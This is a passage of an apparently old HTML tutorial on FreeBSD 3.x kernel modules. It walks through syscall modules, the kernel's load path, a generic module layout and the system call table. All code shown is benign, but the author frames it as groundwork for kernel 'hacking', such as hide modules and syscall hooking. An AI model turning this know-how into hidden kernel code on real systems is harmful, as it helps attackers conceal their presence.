+some minor errors in some explainations I give you, but every piece of code is
+working and the general view should be correct ;)!<br>
+<p>
+<H3><A NAME="I.1."</A>1. FreeBSD 'Modules' - 'Hello World' Syscall Example</H3>
+<p>
+Before starting to explain I will present you a module example which installs
+a system call that will print a simple message on the screen. I also included
+the user space part. You may know this example, I took it from the FreeBSD
+distribution (I only added some comments).
+
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+
+
+/*this is the function which represents our system call*/
+static int
+hello (struct proc *p, void *arg)
+{
+ printf ("hello kernel\n");
+ return 0;
+}
+
+/*on FreeBSD every system call is described by a sysent structure, which holds
+the corresponding system call function (here hello) and the appropriate count
+of arguments (here 0)*/
+
+static struct sysent hello_sysent = {
+ 0,			/* sy_narg */
+ hello			/* sy_call */
+};
+
+
+/*every system call has a certain number (called slot or offset on BSD). This
+number represents the index in the global sysent list holding every syscall.
+BSD is able to search a free slot for a syscall (by setting it to NO_SYSCALL)
+which is used here.*/
+
+static int offset = NO_SYSCALL;
+
+/*this function can be compared to the init_module & cleanup_module functions
+on Linux. The differentiation is done via the cmd variable.*/
+
+static int
+load (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+
+ /*what do we have?*/
+ switch (cmd) {
+ /*we have a load*/
+ case MOD_LOAD :
+  printf ("syscall loaded at %d\n", offset);
+ break;
+ /*we have an unload*/
+ case MOD_UNLOAD :
+  printf ("syscall unloaded from %d\n", offset);
+ break;
+ default :
+  error = EINVAL;
+ break;
+ }
+ return error;
+}
+
+/*This is the most tricky part of this module. That macro will install the
+module and calls the required functions. We will take a deeper look at this
+later.*/
+SYSCALL_MODULE(syscall, &offset, &hello_sysent, load, NULL);
+</xmp>
+
+Compiling this module is very easy on FreeBSD. We just use an universal
+Makefile which is very easy because of the nice MK files used by FreeBSD (BSD).
+Here we go :
+<xmp>
+SRCS	= helloworld.c
+KMOD	= helloworld
+KO	= ${KMOD}.ko
+KLDMOD	= t
+
+
+.include <bsd.kmod.mk>
+</xmp>
+Aren't those MK file a good idea :). So after comiling you get a file called
+helloworld.ko. This file is in ELF format (so no pure object file). <br>
+Take a look at the FreeBSD user space example calling this system call.
+<xmp>
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+int
+main(int argc, char **argv)
+{
+ char *endptr;
+ int syscall_num;
+ struct module_stat stat;
+
+ stat.version = sizeof(stat);
+ /*modstat will retrieve the module_stat structure for our module named
+   syscall (see the SYSCALL_MODULE macro which sets the name to syscall)*/
+ modstat(modfind("syscall"), &stat);  
+ /*extract the slot (syscall) number*/
+ syscall_num = stat.data.intval;
+ /*and call it without any arguments (because we didn't include support for
+   arguments*/
+ return syscall (syscall_num);
+}
+</xmp>
+You can compile this the following way (it's too easy to waste time with a
+Makefile) :
+<xmp>
+# gcc -o call call.c
+</xmp>
+Now you have a working module which will install a system call you can
+call from user space with this little call program. 
+You can load the module with
+<xmp>
+# kldload ./helloworld.ko 
+</xmp>
+and unload with
+<xmp>
+# kldunlod helloworld
+</xmp>
+with 
+<xmp>
+# kldstat 
+</xmp>
+you will get a list of loaded link files (NOT modules).
+Before reading on, you should understand the global scheme used in the sources
+I presented here. 
+
+<p>
+<H3><A NAME="I.2."></A>2. Link Files and Modules - the difference</H3>
+<p>
+
+There is a big difference between the output presented by kldstat and the
+loaded modules. A module on FreeBSD means some part of the kernel, an exec
+driver, a system call module, a device driver... The kernel itself contains
+some modules (FS support for example).  A link file on the other hand is
+something like a wrapper which can hold lots of modules. So our helloworld
+example from above is one module wrapped in the link file helloworld.ko.<br>
+So in general words : A module is just a bit of structured kernel code that
+represents a certain driver (exec format, device, for example) or whatever. A
+link file is just a file holding one or more modules which will be inserted
+into the kernel. <br>
+For those who want to know it exactly; here is the definition by Doug Rabson :
+<xmp>
+Kernel Linker
+The kernel linker simply dynamically loads code into the kernel. A
+symbol table is included in the kernel by ld(1) in the same way as
+for dynamically linked user programs. As files are loaded, the code
+is relocated and any unresolved symbols are matched against the
+kernel's symbol table. Files can also include a list of dependencies
+to allow code which is common to several files to be loaded
+automatically. The kernel can load files without help from a user
+program (in contrast to the older LKM system) and the kernel
+bootstrap can also pre-load files, allowing devices which needed
+before the root disk is available to be dynamically loaded instead of
+statically linked into the kernel.
+As code is loaded, any SYSINITs which it contains are
+run. This makes it possible to write code which is identical whether
+it is statically or dynamically loaded. When a file is unloaded, a
+similar list of functions defined by SYSUNINIT is run.
+<p>
+Modules
+Layered on top of the kernel linker is the module system. It uses
+a SYSINIT to implement a simple event system for code which
+is loaded. The idea is that a piece of code defines a module (using
+DECLARE_MODULE) and supplies a handler routine. The handler
+is called at load, unload and shutdown to allow the module to
+initialise itself. Various kernel subsystems provide generic handler
+functions for registering filesystems, devices or whatever and they
+generally provide a macro which wraps DECLARE_MODULE (e.g.
+VFS_SET).
+</xmp>
+I hope you got the idea, if not read on and re-read this part until you
+understand it totally.
+
+<p>
+<H3><A NAME="I.2.1."></A>2.1 A two in one example</H3>
+<p>
+
+This example is just a proof of concept. It shows how to pack two modules in
+one file using the linker mechanics (two SYSINITs wrapped by SYSCALL_MODULE
+macro).
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+
+/*this is the function our first syscall module (syscall_1) will use*/
+static int
+hello_1 (struct proc *p, void *arg)
+{
+ printf ("hello kernel from syscall_1\n");
+ return 0;
+}
+
+/*this is the function our second syscall module (syscall_2) will use*/
+static int
+hello_2 (struct proc *p, void *arg)
+{
+ printf ("hello kernel from syscall_2\n");
+ return 0;
+}
+
+
+/*first sysent structure which describes the first system call*/
+static struct sysent hello_sysent_1 = {
+ 0,			/* sy_narg */
+ hello_1		/* sy_call */
+};
+
+
+/*second sysent structure which describes the second system call*/
+static struct sysent hello_sysent_2 = {
+ 0,			/* sy_narg */
+ hello_2		/* sy_call */
+};
+
+
+/*both system call slots (numbers) should be selected by the kernel*/
+static int offset_1 = NO_SYSCALL;
+static int offset_2 = NO_SYSCALL;
+
+/*the two load functions*/
+static int
+load_1 (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+
+ switch (cmd) {
+ case MOD_LOAD :
+	printf ("syscall_1 loaded at %d\n", offset_1);
+	break;
+ case MOD_UNLOAD :
+	printf ("syscall_1 unloaded from %d\n", offset_1);
+	break;
+ default :
+	error = EINVAL;
+        break;
+ }
+ return error;
+}
+
+static int
+load_2 (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+
+ switch (cmd) {
+ case MOD_LOAD :
+	printf ("syscall_2 loaded at %d\n", offset_2);
+	break;
+ case MOD_UNLOAD :
+	printf ("syscall_2 unloaded from %d\n", offset_2);
+	break;
+ default :
+	error = EINVAL;
+	break;
+ }
+ return error;
+}
+
+/*install the first module (NAME : syscall_1)*/
+SYSCALL_MODULE(syscall_1, &offset_1, &hello_sysent_1, load_1, NULL);
+
+/*install the second module (NAME : syscall_2)*/
+SYSCALL_MODULE(syscall_2, &offset_2, &hello_sysent_2, load_2, NULL);
+
+</xmp>
+You can use the same Makefile for the link file above. As you can see I
+duplicated every item in this file. This way I implemented two totally
+independend modules packed in one link file. The name of the first module is
+'syscall_1' and the second module's name is 'syscall_2'.<br>
+The following piece of code is the needed user space part which will find
+both  modules and call their system calls.
+<xmp>
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+
+int
+main(int argc, char **argv)
+{
+ char *endptr;
+ int syscall_num;
+ struct module_stat stat;
+
+ /*first module*/
+ stat.version = sizeof(stat);
+ modstat(modfind("syscall_1"), &stat);
+ syscall_num = stat.data.intval;
+ syscall (syscall_num);
+ 
+ /*second module*/
+ stat.version = sizeof(stat);
+ modstat(modfind("syscall_2"), &stat);
+ syscall_num = stat.data.intval;
+ syscall (syscall_num);
+}
+</xmp>
+After this example you should understand the concept of packing modules in
+link files.
+
+<p>
+<H3><A NAME="I.3."></A>3. Diary of a module load process from the kernel
+perspective</H3>
+<p>
+For total Beginners : I suppose those without a going C and BSD knowledge have
+to 'fight' with this part but I can't loose too many words here (the text would
+become far too big); so I pack everything in a short summary. This section is
+only a very brief and not very deep introduction into the module / link file
+handling made by the kernel, but it is enough to understand the rest of this
+text. <br>
+The following code represents the helloworld example in a form where I
+'resolved' the SYSCALL_MODULE macro. I just coded everything by hand (only the
+last part [SYSCALL_MODULE macro] changed) so things become clearer:
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+
+static int
+hello (struct proc *p, void *arg)
+{
+ printf ("hello kernel from syscall_1\n");
+ return 0;
+}
+
+static struct sysent hello_sysent = {
+ 0,		/* sy_narg */
+ hello		/* sy_call */
+};
+
+static int offset = NO_SYSCALL;
+
+static int
+load (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+
+ switch (cmd) {
+ case MOD_LOAD :
+ 	printf ("syscall loaded at %d\n", offset);
+	break;
+ case MOD_UNLOAD :
+	printf ("syscall unloaded from %d\n", offset);
+	break;
+ default :
+	error = EINVAL;
+	break;
+ }
+ return error;
+}
+
+
+/*The following lines do the same as :
+--------------------------------------
+SYSCALL_MODULE(syscall, &offset, &hello_sysent, load, NULL);
+*/
+
+/*fill the X_syscall_mod structure made only for syscall modules*/
+static struct syscall_module_data syscall_syscall_mod = {  
+ load, NULL, &offset, &hello_sysent                          
+};                                                         
+                                                          
+/*fill the module structure; the same for any module*/          
+static moduledata_t syscall_mod = {
+ "syscall", 
+ syscall_module_handler,   /*special handler for syscall modules*/
+ &syscall_syscall_mod      /*speciel syscall module data*/
+};
+
+/*the sysinit structure for starting / registering*/
+static struct sysinit syscall_sys_init = {
+ SI_SUB_DRIVERS,         /*SUBSYSTEM*/
+ SI_ORDER_MIDDLE,        /*ORDER*/
+ module_register_init,   /*the same for any module, register function*/
+ &syscall_mod            /*module specific data*/
+};
+
+/*we want hack at this layer, it just initializing some regions*/
+static void const * const
+__set_sysinit_set_sym_syscall_sys_init=&syscall_sys_init;	
+__asm(".section .set.""sysinit_set"",\"aw\"");		 	  
+__asm(".long " "syscall_sys_init");				 
+__asm(".previous");
+
+</xmp>
+Now let's start from the kldload command which is implemented as a system call
+in kern_linker.c. This system call first checks the securelevel (if > 0 then it
+won't work) after this it will check for UID=0. Then the kernel checks
+whether this link file is already loaded, if so it will abort. If everything
+is ok so far, it will call linker_load_file (kern_linker.c). After some checks
+this function will fill a linker_file structure and pass it to
+linker_file_sysinit (kern_linker.c). This function will use the
+syscall_sysinit_set structure (see example above) for initialization. That
+structure is defined in kernel.h. Normally it is defined by macros
+(we used the hand-made approach to see things clear). Here is the structure :
+<xmp>
+struct sysinit {
+	unsigned int	subsystem;		/* subsystem identifier*/
+	unsigned int	order;			/* init order within subsystem*/
+	void		(*func) __P((void *));	/* init function*/
+	void		*udata;			/* multiplexer/argument */
+	si_elem_t	type;			/* sysinit_elem_type*/
+};
+</xmp>
+The type field is set automatically so I did not set it by hand. The subsystem
+and order codes are also defined in kernel.h. The function pointer points to a
+function that is called at module startup with udata as parameter. As you can
+see in the example above the module_register_init function (kern_module.c) is
+called with the module data structure holding the module specific data. So our
+next step must be this function. <br>
+This function extracts the data from the argument it gets (the module data
+structure). After this the module_register function (kern_module.c) is called
+with the extracted data. This function first sets some fields of the module
+structure (represented by a pointer to it called module_t) which is used by the
+kernel to descibe any loaded module. After setting every field the module
+(represented by the now filled module structure) is added to the global
+module list (called modules). For a better understanding I put the module
+structure here plus a short description :
+<xmp>
+struct module {
+ /*the first two entries are just for global module handling*/
+ TAILQ_ENTRY(module) link;    
+ TAILQ_ENTRY(module) flink;
+ /*this linker_file structure describes the link file the module comes from*/
+ struct linker_file* file;
+ /*references to this module (reference cound)*/
+ int refs;
+ /*id of this module*/
+ int id;
+ /*name of this module*/
+ char *name;
+ /*the mod handler (in our case the load function)*/
+ modeventhand_t handler;
+ /*arguments to the mod handler*/
+ void *arg;
+ /*some - for us not very interesting - data fields*/
+ modspecific_t data;
+}
+</xmp>
+Finally the module_register function calls the modeventhand_t field of the
+module structure (in our case : the syscall_module_handler) with the MOD_LOAD
+command (cmd see example) argument. This function is defined in
+kern_syscalls.c. On MOD_LOAD it calls syscall_register
+(kern_syscalls.c) with the new sysentry and other stuff needed for installing
+the system call. So let's say that syscall_register installed the system call
+and returns (this stuff is not so interesting for us, we will use a more easy
+way to 'hack' system calls). The last piece of code in syscall_module_handler
+calls the self-defined load function (see example) with the same command field
+(on startup MOD_LOAD). This way the module developer is able to do his own
+stuff on LOAD and UNLOAD.<br>
+Now we are ready. The module is loaded and started, and the system call is
+installed. Recall that this example was written for a specific module - a
+SYSCALL_MODULE. There are other module types (like device drivers etc.).
+Please read the Kernel sources again and again and compare them to this part. 
+Everything should be clear.
+
+<p>
+<H3><A NAME="I.4."></A>4. Other kinds of module</h3>
+<p>
+As I said before the helloworld example module is a special so called
+SYSCALL_MODULE that is used to install a certain system call. FreeBSD provides
+other macros and module layouts for different aims. Take a look at the driver
+example that is shipped with FreeBSD. I won't discuss it here, because we will
+never use the standard way of coding FreeBSD forces us to. <br>
+The next section will show how to become independent from those standard
+module layouts.
+
+<p>
+<H3><A NAME="I.5."></A>5. MISC modules with the KLD scheme</h3>
+<p>
+When I first coded some modules on FreeBSD (on an older 2.2.x release) I was
+able to use so called MISC_MODULES. Instead of providing a certain layout for
+special purposes (like SYSCALL_MODULE for system calls etc.) a MISC_MODULE was
+just some piece of code loaded into the kernel, and calling the 'load' function
+written by me. This scheme was ideal for hacking, because I was not forced to
+implement a special kind of module. I had a fast and easy way to insert any
+kernel code. These days are gone on FreeBSD 3.x because the KLD scheme
+provides no MISC_MODULES like the LKM one did. So my first modules (like a
+hide module etc.) did the hacking part, but also installed a system call (I
+used SYSCALL_MODULES). This was no good solution. So I decided to create a
+general module layout which will do the same like the old MISC_MODULES on LKM
+systems : just call a 'load' function and nothing else. <br>
+The following piece of code represents a MISC_MODULE for FreeBSD 3.x
+systems using the KLD method :
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+
+/*our own 'load' function*/
+static int
+dummy_handler(struct module *mod, int what, void *arg)
+{
+ switch(what)
+ {
+  case MOD_LOAD :
+   printf("LOAD\n");
+  break;
+  case MOD_UNLOAD : 
+   printf("UNLOAD\n");
+  break; 
+ }
+ return 0;
+} 
+
+
+/*NOTE : The following stuff 'links' our module into the kernel and calls
+         dummy_handler as our installation routine. I didn't use any macro
+         supplied by some header file for making module coding a bit easier.
+         But this way you will see every piece of code responsible for loading
+         the module.
+*/
+                                                     
+/*fill the module structure*/          
+static moduledata_t dummy_mod = {
+ "dummy", 
+ dummy_handler,           /*normally you would find something like
+                            syscall_module_handler here*/
+ NULL                     /*normally you would find something like
+                            syscall_module_data here (argument for the
+                            syscall_module_handler)*/
+};
+
+/*the rest is the same*/  
+static struct sysinit syscall_sys_init = {
+ SI_SUB_DRIVERS,         /*SUBSYSTEM*/
+ SI_ORDER_MIDDLE,        /*ORDER*/
+ module_register_init,   /*the same for any module*/
+ &dummy_mod            /*data*/
+};
+
+
+/*We can leave this the same, it will work without modification...*/
+static void const * const
+__set_sysinit_set_sym_syscall_sys_init=&syscall_sys_init;	
+__asm(".section .set.""sysinit_set"",\"aw\"");		 	  
+__asm(".long " "syscall_sys_init");				 
+__asm(".previous");
+
+</xmp>
+Compile this module and load it. The only thing it will do is printing a string
+on load and unload. I must admit that the module above is a bit too long for
+everyday coding. So I use one macro defined by the system which will make the
+module a bit shorter but acting the same way. Replace the last lines with
+
+<xmp>
+...
+          
+static moduledata_t dummy_mod = {
+ "dummy", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(dummy, dummy_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>
+Now our module is quite short and works like a MISC_MODULE on LKM systems.
+Any code we want to execute on the kernel layer can be written into the
+dummy_handler function.
+
+<p>
+<H3><A NAME="I.6."></A>6. System calls on FreeBSD</h3>
+<p>
+My Linux LKM article did a quite good job in explaining the way system calls
+in general work. I won't repeat those words here, so I only give you BSD
+relevant and needed material.<br>
+The following list represents every system call that is present by startup on
+a FreeBSD 3.1 system (I took this list form init_sysents.c):
+<xmp>
+struct sysent sysent[] = {
+	{ 0, (sy_call_t *)nosys },			/* 0 = syscall */
+	{ 1, (sy_call_t *)exit },			/* 1 = exit */
+	{ 0, (sy_call_t *)fork },			/* 2 = fork */
+	{ 3, (sy_call_t *)read },			/* 3 = read */
+	{ 3, (sy_call_t *)write },			/* 4 = write */
+	{ 3, (sy_call_t *)open },			/* 5 = open */
+	{ 1, (sy_call_t *)close },			/* 6 = close */
+	{ 4, (sy_call_t *)wait4 },			/* 7 = wait4 */
+	{ compat(2,creat) },		/* 8 = old creat */
+	{ 2, (sy_call_t *)link },			/* 9 = link */
+	{ 1, (sy_call_t *)unlink },			/* 10 = unlink */
+	{ 0, (sy_call_t *)nosys },			/* 11 = obsolete execv */
+	{ 1, (sy_call_t *)chdir },			/* 12 = chdir */
+	{ 1, (sy_call_t *)fchdir },			/* 13 = fchdir */
+	{ 3, (sy_call_t *)mknod },			/* 14 = mknod */
+	{ 2, (sy_call_t *)chmod },			/* 15 = chmod */
+	{ 3, (sy_call_t *)chown },			/* 16 = chown */
+	{ 1, (sy_call_t *)obreak },			/* 17 = break */
+	{ 3, (sy_call_t *)getfsstat },			/* 18 = getfsstat */
+	{ compat(3,lseek) },		/* 19 = old lseek */
+	{ 0, (sy_call_t *)getpid },			/* 20 = getpid */
+	{ 4, (sy_call_t *)mount },			/* 21 = mount */
+	{ 2, (sy_call_t *)unmount },			/* 22 = unmount */
+	{ 1, (sy_call_t *)setuid },			/* 23 = setuid */
+	{ 0, (sy_call_t *)getuid },			/* 24 = getuid */
+	{ 0, (sy_call_t *)geteuid },			/* 25 = geteuid */
+	{ 4, (sy_call_t *)ptrace },			/* 26 = ptrace */
+	{ 3, (sy_call_t *)recvmsg },			/* 27 = recvmsg */
+	{ 3, (sy_call_t *)sendmsg },			/* 28 = sendmsg */
+	{ 6, (sy_call_t *)recvfrom },			/* 29 = recvfrom */
+	{ 3, (sy_call_t *)accept },			/* 30 = accept */
+	{ 3, (sy_call_t *)getpeername },		/* 31 = getpeername */
+	{ 3, (sy_call_t *)getsockname },		/* 32 = getsockname */
+	{ 2, (sy_call_t *)access },			/* 33 = access */
+	{ 2, (sy_call_t *)chflags },			/* 34 = chflags */
+	{ 2, (sy_call_t *)fchflags },			/* 35 = fchflags */
+	{ 0, (sy_call_t *)sync },			/* 36 = sync */
+	{ 2, (sy_call_t *)kill },			/* 37 = kill */
+	{ compat(2,stat) },		/* 38 = old stat */
+	{ 0, (sy_call_t *)getppid },			/* 39 = getppid */
+	{ compat(2,lstat) },		/* 40 = old lstat */
+	{ 1, (sy_call_t *)dup },			/* 41 = dup */
+	{ 0, (sy_call_t *)pipe },			/* 42 = pipe */
+	{ 0, (sy_call_t *)getegid },			/* 43 = getegid */
+	{ 4, (sy_call_t *)profil },			/* 44 = profil */
+	{ 4, (sy_call_t *)ktrace },			/* 45 = ktrace */
+	{ 3, (sy_call_t *)sigaction },			/* 46 = sigaction */
+	{ 0, (sy_call_t *)getgid },			/* 47 = getgid */
+	{ 2, (sy_call_t *)sigprocmask },		/* 48 = sigprocmask */
+	{ 2, (sy_call_t *)getlogin },			/* 49 = getlogin */
+	{ 1, (sy_call_t *)setlogin },			/* 50 = setlogin */
+	{ 1, (sy_call_t *)acct },			/* 51 = acct */
+	{ 0, (sy_call_t *)sigpending },			/* 52 = sigpending */
+	{ 2, (sy_call_t *)sigaltstack },		/* 53 = sigaltstack */
+	{ 3, (sy_call_t *)ioctl },			/* 54 = ioctl */
+	{ 1, (sy_call_t *)reboot },			/* 55 = reboot */
+	{ 1, (sy_call_t *)revoke },			/* 56 = revoke */
+	{ 2, (sy_call_t *)symlink },			/* 57 = symlink */
+	{ 3, (sy_call_t *)readlink },			/* 58 = readlink */
+	{ 3, (sy_call_t *)execve },			/* 59 = execve */
+	{ 1, (sy_call_t *)umask },			/* 60 = umask */
+	{ 1, (sy_call_t *)chroot },			/* 61 = chroot */
+	{ compat(2,fstat) },		/* 62 = old fstat */
+	{ compat(4,getkerninfo) },		/* 63 = old getkerninfo */
+	{ compat(0,getpagesize) },		/* 64 = old getpagesize */
+	{ 3, (sy_call_t *)msync },			/* 65 = msync */
+	{ 0, (sy_call_t *)vfork },			/* 66 = vfork */
+	{ 0, (sy_call_t *)nosys },			/* 67 = obsolete vread */
+	{ 0, (sy_call_t *)nosys },			/* 68 = obsolete vwrite */
+	{ 1, (sy_call_t *)sbrk },			/* 69 = sbrk */
+	{ 1, (sy_call_t *)sstk },			/* 70 = sstk */
+	{ compat(6,mmap) },		/* 71 = old mmap */
+	{ 1, (sy_call_t *)ovadvise },			/* 72 = vadvise */
+	{ 2, (sy_call_t *)munmap },			/* 73 = munmap */
+	{ 3, (sy_call_t *)mprotect },			/* 74 = mprotect */
+	{ 3, (sy_call_t *)madvise },			/* 75 = madvise */
+	{ 0, (sy_call_t *)nosys },			/* 76 = obsolete vhangup */
+	{ 0, (sy_call_t *)nosys },			/* 77 = obsolete vlimit */
+	{ 3, (sy_call_t *)mincore },			/* 78 = mincore */
+	{ 2, (sy_call_t *)getgroups },			/* 79 = getgroups */
+	{ 2, (sy_call_t *)setgroups },			/* 80 = setgroups */
+	{ 0, (sy_call_t *)getpgrp },			/* 81 = getpgrp */
+	{ 2, (sy_call_t *)setpgid },			/* 82 = setpgid */
+	{ 3, (sy_call_t *)setitimer },			/* 83 = setitimer */
+	{ compat(0,wait) },		/* 84 = old wait */
+	{ 1, (sy_call_t *)swapon },			/* 85 = swapon */
+	{ 2, (sy_call_t *)getitimer },			/* 86 = getitimer */
+	{ compat(2,gethostname) },		/* 87 = old gethostname */
+	{ compat(2,sethostname) },		/* 88 = old sethostname */
+	{ 0, (sy_call_t *)getdtablesize },		/* 89 = getdtablesize */
+	{ 2, (sy_call_t *)dup2 },			/* 90 = dup2 */
+	{ 0, (sy_call_t *)nosys },			/* 91 = getdopt */
+	{ 3, (sy_call_t *)fcntl },			/* 92 = fcntl */
+	{ 5, (sy_call_t *)select },			/* 93 = select */
+	{ 0, (sy_call_t *)nosys },			/* 94 = setdopt */
+	{ 1, (sy_call_t *)fsync },			/* 95 = fsync */
+	{ 3, (sy_call_t *)setpriority },		/* 96 = setpriority */
+	{ 3, (sy_call_t *)socket },			/* 97 = socket */
+	{ 3, (sy_call_t *)connect },			/* 98 = connect */
+	{ compat(3,accept) },		/* 99 = old accept */
+	{ 2, (sy_call_t *)getpriority },		/* 100 = getpriority */
+	{ compat(4,send) },		/* 101 = old send */
+	{ compat(4,recv) },		/* 102 = old recv */
+	{ 1, (sy_call_t *)sigreturn },			/* 103 = sigreturn */
+	{ 3, (sy_call_t *)bind },			/* 104 = bind */
+	{ 5, (sy_call_t *)setsockopt },			/* 105 = setsockopt */
+	{ 2, (sy_call_t *)listen },			/* 106 = listen */
+	{ 0, (sy_call_t *)nosys },			/* 107 = obsolete vtimes */
+	{ compat(3,sigvec) },		/* 108 = old sigvec */
+	{ compat(1,sigblock) },		/* 109 = old sigblock */
+	{ compat(1,sigsetmask) },		/* 110 = old sigsetmask */
+	{ 1, (sy_call_t *)sigsuspend },			/* 111 = sigsuspend */
+	{ compat(2,sigstack) },		/* 112 = old sigstack */
+	{ compat(3,recvmsg) },		/* 113 = old recvmsg */
+	{ compat(3,sendmsg) },		/* 114 = old sendmsg */
+	{ 0, (sy_call_t *)nosys },			/* 115 = obsolete vtrace */
+	{ 2, (sy_call_t *)gettimeofday },		/* 116 = gettimeofday */
+	{ 2, (sy_call_t *)getrusage },			/* 117 = getrusage */
+	{ 5, (sy_call_t *)getsockopt },			/* 118 = getsockopt */
+	{ 0, (sy_call_t *)nosys },			/* 119 = resuba */
+	{ 3, (sy_call_t *)readv },			/* 120 = readv */
+	{ 3, (sy_call_t *)writev },			/* 121 = writev */
+	{ 2, (sy_call_t *)settimeofday },		/* 122 = settimeofday */
+	{ 3, (sy_call_t *)fchown },			/* 123 = fchown */
+	{ 2, (sy_call_t *)fchmod },			/* 124 = fchmod */
+	{ compat(6,recvfrom) },		/* 125 = old recvfrom */
+	{ 2, (sy_call_t *)setreuid },			/* 126 = setreuid */
+	{ 2, (sy_call_t *)setregid },			/* 127 = setregid */
+	{ 2, (sy_call_t *)rename },			/* 128 = rename */
+	{ compat(2,truncate) },		/* 129 = old truncate */
+	{ compat(2,ftruncate) },		/* 130 = old ftruncate */
+	{ 2, (sy_call_t *)flock },			/* 131 = flock */
+	{ 2, (sy_call_t *)mkfifo },			/* 132 = mkfifo */
+	{ 6, (sy_call_t *)sendto },			/* 133 = sendto */
+	{ 2, (sy_call_t *)shutdown },			/* 134 = shutdown */
+	{ 4, (sy_call_t *)socketpair },			/* 135 = socketpair */
+	{ 2, (sy_call_t *)mkdir },			/* 136 = mkdir */
+	{ 1, (sy_call_t *)rmdir },			/* 137 = rmdir */
+	{ 2, (sy_call_t *)utimes },			/* 138 = utimes */
+	{ 0, (sy_call_t *)nosys },			/* 139 = obsolete 4.2 sigreturn */
+	{ 2, (sy_call_t *)adjtime },			/* 140 = adjtime */
+	{ compat(3,getpeername) },		/* 141 = old getpeername */
+	{ compat(0,gethostid) },		/* 142 = old gethostid */
+	{ compat(1,sethostid) },		/* 143 = old sethostid */
+	{ compat(2,getrlimit) },		/* 144 = old getrlimit */
+	{ compat(2,setrlimit) },		/* 145 = old setrlimit */
+	{ compat(2,killpg) },		/* 146 = old killpg */
+	{ 0, (sy_call_t *)setsid },			/* 147 = setsid */
+	{ 4, (sy_call_t *)quotactl },			/* 148 = quotactl */
+	{ compat(0,quota) },		/* 149 = old quota */
+	{ compat(3,getsockname) },		/* 150 = old getsockname */
+	{ 0, (sy_call_t *)nosys },			/* 151 = sem_lock */
+	{ 0, (sy_call_t *)nosys },			/* 152 = sem_wakeup */
+	{ 0, (sy_call_t *)nosys },			/* 153 = asyncdaemon */
+	{ 0, (sy_call_t *)nosys },			/* 154 = nosys */
+	{ 2, (sy_call_t *)nosys },			/* 155 = nfssvc */
+	{ compat(4,getdirentries) },		/* 156 = old getdirentries */
+	{ 2, (sy_call_t *)statfs },			/* 157 = statfs */
+	{ 2, (sy_call_t *)fstatfs },			/* 158 = fstatfs */
+	{ 0, (sy_call_t *)nosys },			/* 159 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 160 = nosys */
+	{ 2, (sy_call_t *)nosys },			/* 161 = getfh */
+	{ 2, (sy_call_t *)getdomainname },		/* 162 = getdomainname */
+	{ 2, (sy_call_t *)setdomainname },		/* 163 = setdomainname */
+	{ 1, (sy_call_t *)uname },			/* 164 = uname */
+	{ 2, (sy_call_t *)sysarch },			/* 165 = sysarch */
+	{ 3, (sy_call_t *)rtprio },			/* 166 = rtprio */
+	{ 0, (sy_call_t *)nosys },			/* 167 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 168 = nosys */
+	{ 5, (sy_call_t *)semsys },			/* 169 = semsys */
+	{ 6, (sy_call_t *)msgsys },			/* 170 = msgsys */
+	{ 4, (sy_call_t *)shmsys },			/* 171 = shmsys */
+	{ 0, (sy_call_t *)nosys },			/* 172 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 173 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 174 = nosys */
+	{ 0, (sy_call_t *)nosys },			/* 175 = nosys */
+	{ 1, (sy_call_t *)ntp_adjtime },		/* 176 = ntp_adjtime */
+	{ 0, (sy_call_t *)nosys },			/* 177 = sfork */
+	{ 0, (sy_call_t *)nosys },			/* 178 = getdescriptor */
+	{ 0, (sy_call_t *)nosys },			/* 179 = setdescriptor */
+	{ 0, (sy_call_t *)nosys },			/* 180 = nosys */
+	{ 1, (sy_call_t *)setgid },			/* 181 = setgid */
+	{ 1, (sy_call_t *)setegid },			/* 182 = setegid */
+	{ 1, (sy_call_t *)seteuid },			/* 183 = seteuid */
+	{ 0, (sy_call_t *)nosys },			/* 184 = lfs_bmapv */
+	{ 0, (sy_call_t *)nosys },			/* 185 = lfs_markv */
+	{ 0, (sy_call_t *)nosys },			/* 186 = lfs_segclean */
+	{ 0, (sy_call_t *)nosys },			/* 187 = lfs_segwait */
+	{ 2, (sy_call_t *)stat },			/* 188 = stat */
+	{ 2, (sy_call_t *)fstat },			/* 189 = fstat */
+	{ 2, (sy_call_t *)lstat },			/* 190 = lstat */
+	{ 2, (sy_call_t *)pathconf },			/* 191 = pathconf */
+	{ 2, (sy_call_t *)fpathconf },			/* 192 = fpathconf */
+	{ 0, (sy_call_t *)nosys },			/* 193 = nosys */
+	{ 2, (sy_call_t *)getrlimit },			/* 194 = getrlimit */
+	{ 2, (sy_call_t *)setrlimit },			/* 195 = setrlimit */
+	{ 4, (sy_call_t *)getdirentries },		/* 196 = getdirentries */
+	{ 8, (sy_call_t *)mmap },			/* 197 = mmap */
+	{ 0, (sy_call_t *)nosys },			/* 198 = __syscall */
+	{ 5, (sy_call_t *)lseek },			/* 199 = lseek */
+	{ 4, (sy_call_t *)truncate },			/* 200 = truncate */
